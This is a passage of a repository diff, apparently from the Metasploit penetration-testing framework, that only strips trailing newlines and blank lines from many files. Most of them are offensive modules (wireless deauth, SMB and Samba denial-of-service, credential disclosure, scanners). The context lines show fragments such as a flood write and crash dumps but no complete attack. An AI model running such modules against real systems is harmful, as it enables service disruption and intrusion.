+60,4 @@ class Conf end end -end +end \ No newline at end of file diff --git a/lib/scruby/const.rb b/lib/scruby/const.rb index 8e79d0760a..5bf86f4dd8 100755 --- a/lib/scruby/const.rb +++ b/lib/scruby/const.rb @@ -146,4 +146,4 @@ module Scruby def self.aware_proto @@aware_proto end -end +end \ No newline at end of file diff --git a/lib/scruby/deps.rb b/lib/scruby/deps.rb index 1b70193a8d..6eeacd5025 100644 --- a/lib/scruby/deps.rb +++ b/lib/scruby/deps.rb @@ -26,4 +26,4 @@ module Scruby rescue ::LoadError end -end +end \ No newline at end of file diff --git a/lib/scruby/dissector.rb b/lib/scruby/dissector.rb index a66101dddb..6a5b507d1b 100755 --- a/lib/scruby/dissector.rb +++ b/lib/scruby/dissector.rb @@ -1064,4 +1064,4 @@ bind_layers(TFTP, TFTP_OACK, op=6) bind_layers(TFTP_RRQ, TFTP_Options) bind_layers(TFTP_WRQ, TFTP_Options) bind_layers(TFTP_OACK, TFTP_Options) -=end +=end \ No newline at end of file diff --git a/lib/scruby/field.rb b/lib/scruby/field.rb index 01dceef836..481861562f 100755 --- a/lib/scruby/field.rb +++ b/lib/scruby/field.rb @@ -940,4 +940,4 @@ Scapy (1.2.0.1) fields that Scruby is missing: XBitField XLongField -=end +=end \ No newline at end of file diff --git a/lib/scruby/func.rb b/lib/scruby/func.rb index fd4456fd9f..146ba3b2e2 100755 --- a/lib/scruby/func.rb +++ b/lib/scruby/func.rb @@ -274,4 +274,4 @@ module Scruby puts "In Scruby, type 'mypacket.to_net' instead" end -end +end \ No newline at end of file diff --git a/lib/scruby/help.rb b/lib/scruby/help.rb index 969a8008bf..e684886490 100755 --- a/lib/scruby/help.rb +++ b/lib/scruby/help.rb @@ -118,4 +118,4 @@ Yeah, you've found an Easter Egg!! EOF end -end +end \ No newline at end of file diff --git a/lib/scruby/layer.rb b/lib/scruby/layer.rb index f19d9eaf02..26df0e819a 100755 --- a/lib/scruby/layer.rb +++ b/lib/scruby/layer.rb @@ -198,4 +198,4 @@ class Layer end end -end +end \ No newline at end of file diff --git a/lib/scruby/packet.rb b/lib/scruby/packet.rb index cc787717ec..b241cf9a46 100755 --- a/lib/scruby/packet.rb +++ b/lib/scruby/packet.rb @@ -215,4 +215,4 @@ class Packet end end -end +end \ No newline at end of file diff --git a/lib/scruby/unittest.rb b/lib/scruby/unittest.rb index e0ae1ff642..47787bbdad 100755 --- a/lib/scruby/unittest.rb +++ b/lib/scruby/unittest.rb @@ -317,4 +317,4 @@ puts "Now, read the end of this file for the last things to do." # Check help # Reread, recheck and modify the HTML documentation -end +end \ No newline at end of file diff --git a/lib/zip/ioextras.rb b/lib/zip/ioextras.rb index c458bb58d9..d7d9b4ede2 100755 --- a/lib/zip/ioextras.rb +++ b/lib/zip/ioextras.rb @@ -152,4 +152,4 @@ end # IOExtras namespace module # Copyright (C) 2002-2004 Thomas Sondergaard # rubyzip is free software; you can redistribute it and/or -# modify it under the terms of the ruby license. +# modify it under the terms of the ruby license. \ No newline at end of file diff --git a/lib/zip/stdrubyext.rb b/lib/zip/stdrubyext.rb index 833365dbca..ea6ca7b3b4 100755 --- a/lib/zip/stdrubyext.rb +++ b/lib/zip/stdrubyext.rb @@ -108,4 +108,4 @@ end # Copyright (C) 2002, 2003 Thomas Sondergaard # rubyzip is free software; you can redistribute it and/or -# modify it under the terms of the ruby license. +# modify it under the terms of the ruby license. \ No newline at end of file diff --git a/lib/zip/tempfile_bugfixed.rb b/lib/zip/tempfile_bugfixed.rb index 6cf8e0afb0..44b45151b6 100755 --- a/lib/zip/tempfile_bugfixed.rb +++ b/lib/zip/tempfile_bugfixed.rb @@ -192,4 +192,4 @@ if __FILE__ == $0 f.open p f.gets # => "foo\n" f.close! -end +end \ No newline at end of file diff --git a/lib/zip/zip.rb b/lib/zip/zip.rb index 19d90f5199..a2b1623715 100755 --- a/lib/zip/zip.rb +++ b/lib/zip/zip.rb @@ -1844,4 +1844,4 @@ end # Zip namespace module # Copyright (C) 2002, 2003 Thomas Sondergaard # rubyzip is free software; you can redistribute it and/or -# modify it under the terms of the ruby license. +# modify it under the terms of the ruby license. \ No newline at end of file diff --git a/lib/zip/zipfilesystem.rb b/lib/zip/zipfilesystem.rb index 3fa3748c70..c03c0250a3 100755 --- a/lib/zip/zipfilesystem.rb +++ b/lib/zip/zipfilesystem.rb @@ -606,4 +606,4 @@ end # Copyright (C) 2002, 2003 Thomas Sondergaard # rubyzip is free software; you can redistribute it and/or -# modify it under the terms of the ruby license. +# modify it under the terms of the ruby license. \ No newline at end of file diff --git a/lib/zip/ziprequire.rb b/lib/zip/ziprequire.rb index 5a4c4d48bc..a9f51395b6 100755 --- a/lib/zip/ziprequire.rb +++ b/lib/zip/ziprequire.rb @@ -87,4 +87,4 @@ end # Copyright (C) 2002 Thomas Sondergaard # rubyzip is free software; you can redistribute it and/or -# modify it under the terms of the ruby license. +# modify it under the terms of the ruby license. \ No newline at end of file diff --git a/modules/auxiliary/admin/backupexec/dump.rb b/modules/auxiliary/admin/backupexec/dump.rb index 6a26a25a6c..fcdb9f1ff9 100644 --- a/modules/auxiliary/admin/backupexec/dump.rb +++ b/modules/auxiliary/admin/backupexec/dump.rb @@ -281,5 +281,4 @@ class Metasploit3 < Msf::Auxiliary end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/admin/backupexec/registry.rb b/modules/auxiliary/admin/backupexec/registry.rb index c0e18d6933..fe55a5e3f9 100644 --- a/modules/auxiliary/admin/backupexec/registry.rb +++ b/modules/auxiliary/admin/backupexec/registry.rb @@ -280,5 +280,4 @@ class Metasploit3 < Msf::Auxiliary return stub end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/admin/cisco/ios_http_auth_bypass.rb b/modules/auxiliary/admin/cisco/ios_http_auth_bypass.rb index 390d4b8261..a0c8ac2156 100644 --- a/modules/auxiliary/admin/cisco/ios_http_auth_bypass.rb +++ b/modules/auxiliary/admin/cisco/ios_http_auth_bypass.rb @@ -135,4 +135,4 @@ Example Exploit: ! [snip] -=end +=end \ No newline at end of file diff --git a/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb b/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb index d4314c712c..c1b1c8014f 100644 --- a/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb +++ b/modules/auxiliary/admin/emc/alphastor_devicemanager_exec.rb @@ -60,5 +60,4 @@ class Metasploit3 < Msf::Auxiliary disconnect end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb b/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb index d939ad5af3..7d83877cf4 100644 --- a/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb +++ b/modules/auxiliary/admin/emc/alphastor_librarymanager_exec.rb @@ -57,5 +57,4 @@ class Metasploit3 < Msf::Auxiliary disconnect end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb b/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb index 2dca143343..2e85257771 100644 --- a/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb +++ b/modules/auxiliary/admin/maxdb/maxdb_cons_exec.rb @@ -81,5 +81,4 @@ class Metasploit3 < Msf::Auxiliary end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/admin/motorola/wr850g_cred.rb b/modules/auxiliary/admin/motorola/wr850g_cred.rb index 7c024f5c1d..c29e74800d 100644 --- a/modules/auxiliary/admin/motorola/wr850g_cred.rb +++ b/modules/auxiliary/admin/motorola/wr850g_cred.rb @@ -48,5 +48,4 @@ class Metasploit3 < Msf::Auxiliary print_status("Found username \"#{user}\" and password \"#{pass}\"") if user and pass end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/admin/ms/ms08_059_his2006.rb b/modules/auxiliary/admin/ms/ms08_059_his2006.rb index fe1577c6e2..c97ae585ff 100644 --- a/modules/auxiliary/admin/ms/ms08_059_his2006.rb +++ b/modules/auxiliary/admin/ms/ms08_059_his2006.rb @@ -175,4 +175,4 @@ small _SnaRpcService_ConfigureServiceAccount ( ); } -=end +=end \ No newline at end of file diff --git a/modules/auxiliary/admin/pop2/uw_fileretrieval.rb b/modules/auxiliary/admin/pop2/uw_fileretrieval.rb index a929febb26..cf93a22891 100644 --- a/modules/auxiliary/admin/pop2/uw_fileretrieval.rb +++ b/modules/auxiliary/admin/pop2/uw_fileretrieval.rb @@ -62,5 +62,4 @@ class Metasploit3 < Msf::Auxiliary disconnect end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/admin/serverprotect/file.rb b/modules/auxiliary/admin/serverprotect/file.rb index 30c670bd4a..043f54eaf1 100644 --- a/modules/auxiliary/admin/serverprotect/file.rb +++ b/modules/auxiliary/admin/serverprotect/file.rb @@ -408,5 +408,4 @@ class Metasploit3 < Msf::Auxiliary end end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/admin/webmin/file_disclosure.rb b/modules/auxiliary/admin/webmin/file_disclosure.rb index d53fa55803..939ea18b64 100644 --- a/modules/auxiliary/admin/webmin/file_disclosure.rb +++ b/modules/auxiliary/admin/webmin/file_disclosure.rb @@ -85,5 +85,4 @@ class Metasploit3 < Msf::Auxiliary end end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb b/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb index 223a59615e..aa1d5fab82 100644 --- a/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb +++ b/modules/auxiliary/dos/cisco/ios_http_percentpercent.rb @@ -81,4 +81,4 @@ Example crash: status register = 0x2700 vbr at time of exception = 0x4000000 -=end +=end \ No newline at end of file diff --git a/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb b/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb index f17c3c8feb..63a811768e 100644 --- a/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb +++ b/modules/auxiliary/dos/freebsd/nfsd/nfsd_mount.rb @@ -51,5 +51,4 @@ class Metasploit3 < Msf::Auxiliary disconnect end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/dos/ftp/guildftp_cwdlist.rb b/modules/auxiliary/dos/ftp/guildftp_cwdlist.rb index 2eb92db977..82dc9dcb84 100644 --- a/modules/auxiliary/dos/ftp/guildftp_cwdlist.rb +++ b/modules/auxiliary/dos/ftp/guildftp_cwdlist.rb @@ -37,5 +37,4 @@ class Metasploit3 < Msf::Auxiliary disconnect end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/dos/ftp/titan626_site.rb b/modules/auxiliary/dos/ftp/titan626_site.rb index c561afdb19..1db0a49ede 100644 --- a/modules/auxiliary/dos/ftp/titan626_site.rb +++ b/modules/auxiliary/dos/ftp/titan626_site.rb @@ -33,5 +33,4 @@ class Metasploit3 < Msf::Auxiliary sleep 1 disconnect end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/dos/ftp/xmeasy560_nlst.rb b/modules/auxiliary/dos/ftp/xmeasy560_nlst.rb index f106d93a0d..4ae650223e 100644 --- a/modules/auxiliary/dos/ftp/xmeasy560_nlst.rb +++ b/modules/auxiliary/dos/ftp/xmeasy560_nlst.rb @@ -35,5 +35,4 @@ class Metasploit3 < Msf::Auxiliary print_status("OK, server may still be technically listening, but it won't respond") end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/dos/http/webrick_regex.rb b/modules/auxiliary/dos/http/webrick_regex.rb index 2eb7c91478..f7923481e1 100644 --- a/modules/auxiliary/dos/http/webrick_regex.rb +++ b/modules/auxiliary/dos/http/webrick_regex.rb @@ -46,5 +46,4 @@ class Metasploit3 < Msf::Auxiliary rescue ::Timeout::Error, ::Errno::EPIPE end end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb b/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb index c678cc1310..4b50cfe806 100644 --- a/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb +++ b/modules/auxiliary/dos/samba/lsa_addprivs_heap.rb @@ -86,5 +86,4 @@ class Metasploit3 < Msf::Auxiliary disconnect end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/dos/samba/lsa_transnames_heap.rb b/modules/auxiliary/dos/samba/lsa_transnames_heap.rb index 47833e9d38..4e65bfc4db 100644 --- a/modules/auxiliary/dos/samba/lsa_transnames_heap.rb +++ b/modules/auxiliary/dos/samba/lsa_transnames_heap.rb @@ -88,5 +88,4 @@ class Metasploit3 < Msf::Auxiliary disconnect end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb b/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb index ee06391404..dae51e721e 100644 --- a/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb +++ b/modules/auxiliary/dos/solaris/lpd/cascade_delete.rb @@ -113,5 +113,4 @@ class Metasploit3 < Msf::Auxiliary return true end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/dos/windows/appian/appian_bpm.rb b/modules/auxiliary/dos/windows/appian/appian_bpm.rb index d6373421ca..9a342fac65 100644 --- a/modules/auxiliary/dos/windows/appian/appian_bpm.rb +++ b/modules/auxiliary/dos/windows/appian/appian_bpm.rb @@ -98,5 +98,4 @@ class Metasploit3 < Msf::Auxiliary disconnect end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb b/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb index 1790a7495c..d11639ea13 100644 --- a/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb +++ b/modules/auxiliary/dos/windows/ftp/winftp230_nlst.rb @@ -31,6 +31,4 @@ class Metasploit3 < Msf::Auxiliary disconnect end -end - - +end \ No newline at end of file diff --git a/modules/auxiliary/dos/windows/nat/nat_helper.rb b/modules/auxiliary/dos/windows/nat/nat_helper.rb index fa76987b20..76dc178445 100644 --- a/modules/auxiliary/dos/windows/nat/nat_helper.rb +++ b/modules/auxiliary/dos/windows/nat/nat_helper.rb @@ -54,5 +54,4 @@ class Metasploit3 < Msf::Auxiliary disconnect_udp end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb b/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb index 151254e43e..9213e7f81b 100644 --- a/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb +++ b/modules/auxiliary/dos/windows/smb/ms05_047_pnp.rb @@ -115,5 +115,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb b/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb index 96386e2c11..158d76b0ab 100644 --- a/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb +++ b/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb @@ -103,5 +103,4 @@ class Metasploit3 < Msf::Auxiliary disconnect end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb b/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb index dbee1dea31..cc30ed8e9a 100644 --- a/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb +++ b/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb @@ -70,5 +70,4 @@ class Metasploit3 < Msf::Auxiliary disconnect end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb b/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb index 768375e79a..f97b88c9ae 100644 --- a/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb +++ b/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb @@ -81,5 +81,4 @@ class Metasploit3 < Msf::Auxiliary disconnect end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb b/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb index d3473ce841..86b9d9b735 100644 --- a/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb +++ b/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb @@ -119,5 +119,4 @@ class Metasploit3 < Msf::Auxiliary disconnect end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/dos/wireless/cts_rts_flood.rb b/modules/auxiliary/dos/wireless/cts_rts_flood.rb index 499f3e42fb..42c687e0c5 100644 --- a/modules/auxiliary/dos/wireless/cts_rts_flood.rb +++ b/modules/auxiliary/dos/wireless/cts_rts_flood.rb @@ -70,6 +70,4 @@ class Metasploit3 < Msf::Auxiliary return frame end -end - - +end \ No newline at end of file diff --git a/modules/auxiliary/dos/wireless/daringphucball.rb b/modules/auxiliary/dos/wireless/daringphucball.rb index f4b88ffc52..e4db8c862b 100644 --- a/modules/auxiliary/dos/wireless/daringphucball.rb +++ b/modules/auxiliary/dos/wireless/daringphucball.rb @@ -167,4 +167,4 @@ warning: Previous frame identical to this frame (corrupt stack?) 0x17443be0: 0x17443c60 0x01bc81f4 0x007a1d48 0x00000000 0x17443bf0: 0x17443c20 0x00008088 0x01bc8000 0x0227581e -=end +=end \ No newline at end of file diff --git a/modules/auxiliary/dos/wireless/deauth.rb b/modules/auxiliary/dos/wireless/deauth.rb index dbd59257b6..942c206ab8 100644 --- a/modules/auxiliary/dos/wireless/deauth.rb +++ b/modules/auxiliary/dos/wireless/deauth.rb @@ -56,6 +56,4 @@ class Metasploit3 < Msf::Auxiliary "\x07\x00" # Reason Code (nonassoc. sta) return frame end -end - - +end \ No newline at end of file diff --git a/modules/auxiliary/dos/wireless/fakeap.rb b/modules/auxiliary/dos/wireless/fakeap.rb index 687c2289e1..ea7593f517 100644 --- a/modules/auxiliary/dos/wireless/fakeap.rb +++ b/modules/auxiliary/dos/wireless/fakeap.rb @@ -81,5 +81,4 @@ class Metasploit3 < Msf::Auxiliary end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/dos/wireless/fuzz_beacon.rb b/modules/auxiliary/dos/wireless/fuzz_beacon.rb index c81a1d5bad..da5184efd2 100644 --- a/modules/auxiliary/dos/wireless/fuzz_beacon.rb +++ b/modules/auxiliary/dos/wireless/fuzz_beacon.rb @@ -131,5 +131,4 @@ class Metasploit3 < Msf::Auxiliary end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/dos/wireless/fuzz_proberesp.rb b/modules/auxiliary/dos/wireless/fuzz_proberesp.rb index 515530ddc8..e080cd5ba4 100644 --- a/modules/auxiliary/dos/wireless/fuzz_proberesp.rb +++ b/modules/auxiliary/dos/wireless/fuzz_proberesp.rb @@ -130,5 +130,4 @@ class Metasploit3 < Msf::Auxiliary end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/dos/wireless/netgear_ma521_rates.rb b/modules/auxiliary/dos/wireless/netgear_ma521_rates.rb index 6b34d3a120..2b5b93a502 100644 --- a/modules/auxiliary/dos/wireless/netgear_ma521_rates.rb +++ b/modules/auxiliary/dos/wireless/netgear_ma521_rates.rb @@ -121,4 +121,4 @@ Arg1: 41414141, memory referenced Arg2: 00000002, IRQL Arg3: 00000000, value 0 = read operation, 1 = write operation Arg4: aa1ec75a, address which referenced memory -=end +=end \ No newline at end of file diff --git a/modules/auxiliary/dos/wireless/netgear_wg311pci.rb b/modules/auxiliary/dos/wireless/netgear_wg311pci.rb index a900ab60cb..1e39683313 100644 --- a/modules/auxiliary/dos/wireless/netgear_wg311pci.rb +++ b/modules/auxiliary/dos/wireless/netgear_wg311pci.rb @@ -120,4 +120,4 @@ Arg1: 00000020, a pool block header size is corrupt. Arg2: 81cae7b0, The pool entry we were looking for within the page. Arg3: 81cae8c8, The next pool entry. Arg4: 0a23002b, (reserved) -=end +=end \ No newline at end of file diff --git a/modules/auxiliary/dos/wireless/probe_resp_null_ssid.rb b/modules/auxiliary/dos/wireless/probe_resp_null_ssid.rb index 2e99770337..5831a2d7c4 100644 --- a/modules/auxiliary/dos/wireless/probe_resp_null_ssid.rb +++ b/modules/auxiliary/dos/wireless/probe_resp_null_ssid.rb @@ -82,5 +82,4 @@ class Metasploit3 < Msf::Auxiliary return frame end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/dos/wireless/wifun.rb b/modules/auxiliary/dos/wireless/wifun.rb index ece831ecb0..3e7dd2e91b 100644 --- a/modules/auxiliary/dos/wireless/wifun.rb +++ b/modules/auxiliary/dos/wireless/wifun.rb @@ -37,5 +37,4 @@ class Metasploit3 < Msf::Auxiliary wifi.write("X" * 1000) end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/dos/wireshark/ldap.rb b/modules/auxiliary/dos/wireshark/ldap.rb index baa3229315..272a804716 100644 --- a/modules/auxiliary/dos/wireshark/ldap.rb +++ b/modules/auxiliary/dos/wireshark/ldap.rb @@ -62,5 +62,4 @@ class Metasploit3 < Msf::Auxiliary end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb b/modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb index 6d77f17e5c..cf51fdcf32 100644 --- a/modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb +++ b/modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb @@ -66,6 +66,4 @@ class Metasploit3 < Msf::Auxiliary end -end - - +end \ No newline at end of file diff --git a/modules/auxiliary/scanner/dcerpc/hidden.rb b/modules/auxiliary/scanner/dcerpc/hidden.rb index 0f78de4e60..811d894fe5 100644 --- a/modules/auxiliary/scanner/dcerpc/hidden.rb +++ b/modules/auxiliary/scanner/dcerpc/hidden.rb @@ -122,6 +122,4 @@ class Metasploit3 < Msf::Auxiliary end -end - - +end \ No newline at end of file diff --git a/modules/auxiliary/scanner/dcerpc/management.rb b/modules/auxiliary/scanner/dcerpc/management.rb index 38f51ee8dd..560d553c80 100644 --- a/modules/auxiliary/scanner/dcerpc/management.rb +++ b/modules/auxiliary/scanner/dcerpc/management.rb @@ -72,6 +72,4 @@ class Metasploit3 < Msf::Auxiliary end -end - - +end \ No newline at end of file diff --git a/modules/auxiliary/scanner/discovery/sweep_udp.rb b/modules/auxiliary/scanner/discovery/sweep_udp.rb index afe3ae8bc2..a9ae271f06 100644 --- a/modules/auxiliary/scanner/discovery/sweep_udp.rb +++ b/modules/auxiliary/scanner/discovery/sweep_udp.rb @@ -333,5 +333,4 @@ class Metasploit3 < Msf::Auxiliary def probe_pkt_sentinel(ip) return ["\x7a\x00\x00\x00\x00\x00", 5093] end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/scanner/emc/alphastor_devicemanager.rb b/modules/auxiliary/scanner/emc/alphastor_devicemanager.rb index 66179795ea..2af97e4986 100644 --- a/modules/auxiliary/scanner/emc/alphastor_devicemanager.rb +++ b/modules/auxiliary/scanner/emc/alphastor_devicemanager.rb @@ -48,5 +48,4 @@ class Metasploit3 < Msf::Auxiliary disconnect end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/scanner/emc/alphastor_librarymanager.rb b/modules/auxiliary/scanner/emc/alphastor_librarymanager.rb index f00cb15921..849467ade5 100644 --- a/modules/auxiliary/scanner/emc/alphastor_librarymanager.rb +++ b/modules/auxiliary/scanner/emc/alphastor_librarymanager.rb @@ -48,5 +48,4 @@ class Metasploit3 < Msf::Auxiliary disconnect end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/scanner/ftp/anonymous.rb b/modules/auxiliary/scanner/ftp/anonymous.rb index 8fcfd913de..12f8fb18db 100644 --- a/modules/auxiliary/scanner/ftp/anonymous.rb +++ b/modules/auxiliary/scanner/ftp/anonymous.rb @@ -62,4 +62,4 @@ class Metasploit3 < Msf::Auxiliary end end -end +end \ No newline at end of file diff --git a/modules/auxiliary/scanner/http/frontpage.rb b/modules/auxiliary/scanner/http/frontpage.rb index 9696cd8b0d..f222831f62 100644 --- a/modules/auxiliary/scanner/http/frontpage.rb +++ b/modules/auxiliary/scanner/http/frontpage.rb @@ -61,5 +61,4 @@ class Metasploit3 < Msf::Auxiliary end end end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/scanner/http/frontpage_login.rb b/modules/auxiliary/scanner/http/frontpage_login.rb index bfb5a1ae7e..a41fcd1aff 100644 --- a/modules/auxiliary/scanner/http/frontpage_login.rb +++ b/modules/auxiliary/scanner/http/frontpage_login.rb @@ -120,5 +120,4 @@ class Metasploit3 < Msf::Auxiliary disconnect end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/scanner/http/lucky_punch.rb b/modules/auxiliary/scanner/http/lucky_punch.rb index d3a274d097..9b899202d2 100644 --- a/modules/auxiliary/scanner/http/lucky_punch.rb +++ b/modules/auxiliary/scanner/http/lucky_punch.rb @@ -104,5 +104,4 @@ DECLARE @T varchar(255),@C varchar(255) end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/scanner/http/version.rb b/modules/auxiliary/scanner/http/version.rb index a6aff8f5e1..0f8b597f98 100644 --- a/modules/auxiliary/scanner/http/version.rb +++ b/modules/auxiliary/scanner/http/version.rb @@ -103,5 +103,4 @@ class Metasploit3 < Msf::Auxiliary ' ( ' + extras.join(', ') + ' )' end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/scanner/http/wmap_backup_file.rb b/modules/auxiliary/scanner/http/wmap_backup_file.rb index 4a1c13f024..fe3b741ddd 100644 --- a/modules/auxiliary/scanner/http/wmap_backup_file.rb +++ b/modules/auxiliary/scanner/http/wmap_backup_file.rb @@ -81,5 +81,4 @@ class Metasploit3 < Msf::Auxiliary end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/scanner/http/wmap_blind_sql_query.rb b/modules/auxiliary/scanner/http/wmap_blind_sql_query.rb index ee357f51b4..609797165d 100644 --- a/modules/auxiliary/scanner/http/wmap_blind_sql_query.rb +++ b/modules/auxiliary/scanner/http/wmap_blind_sql_query.rb @@ -159,5 +159,4 @@ class Metasploit3 < Msf::Auxiliary end end end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/scanner/http/wmap_brute_dirs.rb b/modules/auxiliary/scanner/http/wmap_brute_dirs.rb index 6dffd1bd0b..bcfca1d172 100644 --- a/modules/auxiliary/scanner/http/wmap_brute_dirs.rb +++ b/modules/auxiliary/scanner/http/wmap_brute_dirs.rb @@ -214,4 +214,4 @@ module Enumerable a end -end +end \ No newline at end of file diff --git a/modules/auxiliary/scanner/http/wmap_dir_listing.rb b/modules/auxiliary/scanner/http/wmap_dir_listing.rb index ef146bf224..ea11d76f32 100644 --- a/modules/auxiliary/scanner/http/wmap_dir_listing.rb +++ b/modules/auxiliary/scanner/http/wmap_dir_listing.rb @@ -59,5 +59,4 @@ class Metasploit3 < Msf::Auxiliary rescue ::Timeout::Error, ::Errno::EPIPE end end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/scanner/http/wmap_files_dir.rb b/modules/auxiliary/scanner/http/wmap_files_dir.rb index c871434f0f..d59eb0192d 100644 --- a/modules/auxiliary/scanner/http/wmap_files_dir.rb +++ b/modules/auxiliary/scanner/http/wmap_files_dir.rb @@ -71,5 +71,4 @@ class Metasploit3 < Msf::Auxiliary } end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/scanner/http/wmap_replace_ext.rb b/modules/auxiliary/scanner/http/wmap_replace_ext.rb index 383788c5c4..68cdfd6719 100644 --- a/modules/auxiliary/scanner/http/wmap_replace_ext.rb +++ b/modules/auxiliary/scanner/http/wmap_replace_ext.rb @@ -84,5 +84,4 @@ class Metasploit3 < Msf::Auxiliary end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/scanner/http/wmap_vhost_scanner.rb b/modules/auxiliary/scanner/http/wmap_vhost_scanner.rb index 0a04939b89..09853160cd 100644 --- a/modules/auxiliary/scanner/http/wmap_vhost_scanner.rb +++ b/modules/auxiliary/scanner/http/wmap_vhost_scanner.rb @@ -115,5 +115,4 @@ require 'cgi' end end - end - + end \ No newline at end of file diff --git a/modules/auxiliary/scanner/http/writable.rb b/modules/auxiliary/scanner/http/writable.rb index 7763c6567c..dc5b2de7fc 100644 --- a/modules/auxiliary/scanner/http/writable.rb +++ b/modules/auxiliary/scanner/http/writable.rb @@ -95,5 +95,4 @@ class Metasploit3 < Msf::Auxiliary end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/scanner/misc/ib_service_mgr_info.rb b/modules/auxiliary/scanner/misc/ib_service_mgr_info.rb index e2e115eb44..936ad191b2 100644 --- a/modules/auxiliary/scanner/misc/ib_service_mgr_info.rb +++ b/modules/auxiliary/scanner/misc/ib_service_mgr_info.rb @@ -225,6 +225,4 @@ class Metasploit3 < Msf::Auxiliary end -end - - +end \ No newline at end of file diff --git a/modules/auxiliary/scanner/mssql/mssql_login.rb b/modules/auxiliary/scanner/mssql/mssql_login.rb index 3cda956db1..9edf1296cc 100644 --- a/modules/auxiliary/scanner/mssql/mssql_login.rb +++ b/modules/auxiliary/scanner/mssql/mssql_login.rb @@ -56,5 +56,4 @@ class Metasploit3 < Msf::Auxiliary end end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/scanner/mssql/mssql_ping.rb b/modules/auxiliary/scanner/mssql/mssql_ping.rb index f9046f5e31..c120ccab33 100644 --- a/modules/auxiliary/scanner/mssql/mssql_ping.rb +++ b/modules/auxiliary/scanner/mssql/mssql_ping.rb @@ -46,5 +46,4 @@ class Metasploit3 < Msf::Auxiliary rescue Errno::EACCES end end -end - +end \ No newline at end of file diff --git a/modules/auxiliary/scanner/portscan/tcp.rb b/modules/auxiliary/scanner/portscan/tcp.rb index 297735c116..85d8d0308e 100644 --- a/modules/auxiliary/scanner/portscan/tcp.rb +++ b/modules/auxiliary/scanner/portscan/tcp.rb @@ -82,4 +82,4 @@ class Metasploit3 < 